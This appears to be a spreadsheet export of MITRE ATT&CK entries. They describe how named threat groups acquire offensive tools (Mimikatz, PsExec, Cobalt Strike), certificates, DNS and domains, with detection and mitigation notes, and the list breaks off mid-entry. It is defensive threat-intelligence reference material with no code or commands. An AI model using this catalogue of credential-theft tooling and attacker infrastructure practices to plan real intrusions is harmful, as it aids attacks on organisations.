BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has obtained and used open-source tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [gsecdump](https://attack.mitre.org/software/S0008), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Symantec Tick Apr 2016)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.(Citation: ESET BackdoorDiplomacy Jun 2021)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has obtained and used tools such as Putty, SNScan, and [PsExec](https://attack.mitre.org/software/S0029) for its operations.(Citation: Symantec Palmerworm Sep 2020)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: RedCanary Mockingbird May 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029) and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Kaspersky Carbanak)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has obtained and used tools such as [BloodHound](https://attack.mitre.org/software/S0521), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Mimikatz](https://attack.mitre.org/software/S0002), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Cleaver
[Cleaver](https://attack.mitre.org/groups/G0003) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029), [Windows Credential Editor](https://attack.mitre.org/software/S0005), and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Cylance Cleaver)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has obtained and used a variety of tools including [Mimikatz](https://attack.mitre.org/software/S0002), [PsExec](https://attack.mitre.org/software/S0029), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [SDelete](https://attack.mitre.org/software/S0195).(Citation: PTSecurity Cobalt Dec 2016)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) has used Metasploit, [Empire](https://attack.mitre.org/software/S0363), and AirVPN for post-exploitation activities.(Citation: ClearSky and Trend Micro Operation Wilted Tulip July 2017)(Citation: Microsoft POLONIUM June 2022)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Empire](https://attack.mitre.org/software/S0363), and [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Unit 42 DarkHydrus July 2018)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) has obtained and used tools such as [Impacket](https://attack.mitre.org/software/S0357), [Winexe](https://attack.mitre.org/software/S0191), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Securelist DarkVishnya Dec 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [CrackMapExec](https://attack.mitre.org/software/S0488), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Secureworks IRON LIBERTY July 2019)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has obtained and used open source scripts from GitHub.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) 
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has relied on publicly-available software to gain footholds and establish persistence in victim environments.(Citation: FireEye FIN10 June 2017)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized publicly available tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Impacket](https://attack.mitre.org/software/S0357), PWdump7, ProcDump, Nmap, and Incognito V2 for targeting efforts.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has obtained and used a customized version of [PsExec](https://attack.mitre.org/software/S0029), as well as use other tools such as [pwdump](https://attack.mitre.org/software/S0006), [SDelete](https://attack.mitre.org/software/S0195), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [AdFind](https://attack.mitre.org/software/S0552).(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has utilized a variety of tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154), [PowerSploit](https://attack.mitre.org/software/S0194), and the remote management tool, Atera for targeting efforts.(Citation: Mandiant FIN7 Apr 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used open-source tools such as [Impacket](https://attack.mitre.org/software/S0357) for targeting efforts.(Citation: Bitdefender Sardonic Aug 2021)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has obtained open source tools for its operations, including JsonCPP and Psiphon.(Citation: Kaspersky Ferocious Kitten Jun 2021)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.(Citation: Microsoft GALLIUM December 2019)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) has obtained and used tools such as [QuasarRAT](https://attack.mitre.org/software/S0262) and [Remcos](https://attack.mitre.org/software/S0332).(Citation: Unit 42 Gorgon Group Aug 2018)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has acquired, and sometimes customized, open source tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Empire](https://attack.mitre.org/software/S0363), VNC remote access software, and DIG.net.(Citation: Kaspersky Lyceum October 2021)(Citation: SecureWorks August 2019)(Citation: Zscaler Lyceum DnsSystem June 2022)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has obtained and used open-source tools such as [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Kaspersky Cloud Atlas August 2019)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) has acquired open source tools such as [NBTscan](https://attack.mitre.org/software/S0590) and Meterpreter for their operations.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017) 
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: NCC Group APT15 Alive and Strong)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained and used tools such as Nirsoft WebBrowserPassVIew, [Mimikatz](https://attack.mitre.org/software/S0002), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has obtained tools such as RVTools and AD Explorer for their operations.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained a variety of tools for their operations, including [Responder](https://attack.mitre.org/software/S0174) and PuTTy PSCP.(Citation: Kaspersky ThreatNeedle Feb 2021)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) has obtained and used tools such as [LaZagne](https://attack.mitre.org/software/S0349), [Mimikatz](https://attack.mitre.org/software/S0002), [PsExec](https://attack.mitre.org/software/S0029), and [MailSniper](https://attack.mitre.org/software/S0413).(Citation: Symantec Leafminer July 2018)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has obtained an ARP spoofing tool from GitHub.(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has obtained and used tools like [Havij](https://attack.mitre.org/software/S0224), [sqlmap](https://attack.mitre.org/software/S0225), Metasploit, [Mimikatz](https://attack.mitre.org/software/S0002), and Plink.(Citation: Check Point Rocket Kitten)(Citation: FireEye APT35 2018)(Citation: Check Point APT35 CharmPower January 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has used Microsoft's Console Debugger in some of their operations.(Citation: SentinelLabs Metador Sept 2022)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has used the commercial tool DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)
MuddyWater
MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.(Citation: Anomali Static Kitten February 2021)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has obtained and used tools such as AirVPN and plink in their operations.(Citation: Microsoft POLONIUM June 2022) 
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has obtained and used open-source tools such as [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Volexity Patchwork June 2018)
PittyTiger
[PittyTiger](https://attack.mitre.org/groups/G0011) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [gsecdump](https://attack.mitre.org/software/S0008).(Citation: Bizeul 2014)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has acquired open-source tools for their operations, including [Invoke-PSImage](https://attack.mitre.org/software/S0231), which was used to establish an encrypted channel from a compromised host to [Sandworm Team](https://attack.mitre.org/groups/G0034)'s C2 server in preparation for the 2018 Winter Olympics attack, as well as [Impacket](https://attack.mitre.org/software/S0357) and RemoteExec, which were used in their 2022 [Prestige](https://attack.mitre.org/software/S1058) operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Microsoft Prestige ransomware October 2022)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has obtained and modified versions of publicly-available tools like [Empire](https://attack.mitre.org/software/S0363) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Group IB Silence Aug 2019) (Citation: SecureList Silence Nov 2017)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.(Citation: Proofpoint TA407 September 2019)(Citation: Secureworks COBALT DICKENS September 2019)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used commodity remote access tools.(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used a variety of tools in their operations, including [AdFind](https://attack.mitre.org/software/S0552), [BloodHound](https://attack.mitre.org/software/S0521), [Mimikatz](https://attack.mitre.org/software/S0002), and [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: NCC Group TA505)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: FireEye TRITON 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has obtained and used tools such as [Impacket](https://attack.mitre.org/software/S0357), [pwdump](https://attack.mitre.org/software/S0006), [Mimikatz](https://attack.mitre.org/software/S0002), [gsecdump](https://attack.mitre.org/software/S0008), [NBTscan](https://attack.mitre.org/software/S0590), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Unit42 Emissary Panda May 2019)(Citation: Dell TG-3390)
Thrip
[Thrip](https://attack.mitre.org/groups/G0076) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002) and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Symantec Thrip June 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has obtained and customized publicly-available tools like [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Waterbug Jun 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used customized versions of open-source tools for C2.(Citation: Microsoft Volt Typhoon May 2023)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has obtained and used [Empire](https://attack.mitre.org/software/S0363) for post-exploitation activities.(Citation: Lab52 WIRTE Apr 2019)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Whitefly March 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized tools such as [Empire](https://attack.mitre.org/software/S0363), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Cobalt Strike](https://attack.mitre.org/software/S0154), [Rubeus](https://attack.mitre.org/software/S1071), [AdFind](https://attack.mitre.org/software/S0552), [BloodHound](https://attack.mitre.org/software/S0521), Metasploit, Advanced IP Scanner, Nirsoft PingInfoView, and SoftPerfect Network Scanner for targeting efforts.(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used and modified open-source tools like [Impacket](https://attack.mitre.org/software/S0357), [Mimikatz](https://attack.mitre.org/software/S0002), and [pwdump](https://attack.mitre.org/software/S0006).(Citation: PWC Cloud Hopper Technical Annex April 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Certificate Registration
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Response Content
Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal SSL/TLS certificates that can be used during targeting. Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Operation Honeybee
For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.(Citation: McAfee Honeybee)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used valid, stolen digital certificates for some of their malware and tools.(Citation: ESET PLEAD Malware July 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has obtained SSL certificates for their C2 domains.(Citation: CISA AppleJeus Feb 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used a valid digital certificate for some of their malware.(Citation: Kaspersky LuminousMoth July 2021) 
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has obtained free Let's Encrypt SSL certificates for use on their phishing pages.(Citation: Phish Labs Silent Librarian)(Citation: Secureworks COBALT DICKENS September 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has acquired dynamic DNS services for use in the targeting of intended victims.(Citation: Novetta-Axiom)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has set up custom DNS servers to send commands to compromised hosts via TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Social Media
Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has compromised social media accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active DNS
Monitor for queried domain name system (DNS) registry data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Domain Registration
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Passive DNS
Monitor for logged domain name system (DNS) data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Response Content
Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Response Metadata
Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used large groups of compromised machines for use as proxy nodes.(Citation: Novetta-Axiom)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices.(Citation: NCSC Cyclops Blink February 2022)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has routed traffic through compromised small office and home office (SOHO) network equipment, many of which were located in the same geographic area as the victim.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active DNS
Monitor for queried domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Passive DNS
Monitor for logged domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has reconfigured a victim's DNS records to actor-controlled domains and websites.(Citation: NCC Group LAPSUS Apr 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active DNS
Monitor for queried domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting. In some cases, abnormal subdomain IP addresses (such as those originating in a different country from the root domain) may indicate a malicious subdomain.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Domain Registration
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Passive DNS
Monitor for logged domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting.  In some cases, abnormal subdomain IP addresses (such as those originating in a different country from the root domain) may indicate a malicious subdomain.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.(Citation: Mandiant UNC3890 Aug 2022)
C0021
For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used legitimate but compromised domains to host malicious payloads.(Citation: Microsoft Unidentified Dec 2018)
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) compromised domains in Italy and other countries for their C2 infrastructure.(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) compromised domains to use for C2.(Citation: MSTIC NOBELIUM Mar 2021)
APT1
[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points.(Citation: Mandiant APT1)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised legitimate sites and used them to distribute malware.(Citation: KISA Operation Muzabi)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used compromised domains to host links targeted to specific phishing victims.(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 July2021)(Citation: Certfa Charming Kitten January 2021)(Citation: Google Iran Threats October 2021)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has compromised domains for some of their infrastructure, including for C2 and staging malware.(Citation: MalwareBytes SideCopy Dec 2021)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has compromised domains for use in targeted malicious campaigns.(Citation: Proofpoint Operation Transparent Tribe March 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.(Citation: Mandiant UNC3890 Aug 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.(Citation: Volexity Ocean Lotus November 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised websites to redirect traffic and to host exploit kits.(Citation: Gigamon Berserk Bear October 2021)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.(Citation: Mandiant FIN7 Apr 2022)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has redirected compromised machines to an actor-controlled webpage through HTML injection.(Citation: Bitdefender LuminousMoth July 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.(Citation: Gallagher 2015)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has set up websites with malicious hyperlinks and iframes to infect targeted victims with [Crimson](https://attack.mitre.org/software/S0115), [njRAT](https://attack.mitre.org/software/S0385), and other malicious tools.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Unit 42 ProjectM March 2016)(Citation: Talos Transparent Tribe May 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active DNS
Monitor queried domain name system (DNS) registry data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
Domain Registration
Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
Passive DNS
Monitor logged domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. 
Pre-compromise
Organizations may intentionally register similar domains to their own to deter adversaries from creating typosquatting domains. Other facets of this technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer.(Citation: Mandiant UNC3890 Aug 2022)
C0011
For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) registered domains likely designed to appear relevant to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
C0021
For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors registered domains for use in C2.(Citation: FireEye APT29 Nov 2018)
C0026
For [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors re-registered expired C2 domains previously used for [ANDROMEDA](https://attack.mitre.org/software/S1074) malware.(Citation: Mandiant Suspected Turla Campaign February 2023)
CostaRicto
For [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors established domains, some of which appeared to spoof legitimate domains.(Citation: BlackBerry CostaRicto November 2020)
FunnyDream
For [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors registered a variety of domains.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) registered a domain name identical to that of a compromised company as part of their BEC effort.(Citation: ESET Lazarus Jun 2020)
Operation Dust Storm
For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established domains as part of their operational infrastructure.(Citation: Cylance Dust Storm)
Operation Ghost
For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) registered domains for use in C2 including some crafted to appear as existing legitimate domains.(Citation: ESET Dukes October 2019)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors registered domains for C2.(Citation: McAfee Honeybee)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors registered hundreds of domains using Duck DNS and DNS Exit.(Citation: ESET Operation Spalax Jan 2021)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) acquired C2 domains, sometimes through resellers.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has registered hundreds of domains for use in operations.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.(Citation: FireEye APT28)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Google TAG Ukraine Threat Landscape March 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has set up and operated websites to gather information and deliver malware.(Citation: Volexity Ocean Lotus November 2020)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has registered a variety of domains to host malicious payloads and for C2.(Citation: Forcepoint BITTER Pakistan Oct 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has registered domains for targeting intended victims.(Citation: CISA AA20-296A Berserk Bear December 2020)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has registered domains to spoof targeted organizations by changing the top-level domain (TLD) to “.us”, “.co” or “.biz”.(Citation: Google EXOTIC LILY March 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) 
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has registered look-alike domains for use in phishing campaigns.(Citation: eSentire FIN7 July 2021)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has acquired domains imitating legitimate sites.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered multiple domains to facilitate payload staging and C2.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.(Citation: SecureWorks August 2019)(Citation: Dragos Hexane)(Citation: ClearSky Siamesekitten August 2021)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) has established domains, some of which were designed to look like official government domains, for their operations.(Citation: Checkpoint IndigoZebra July 2021)
Kimsuky
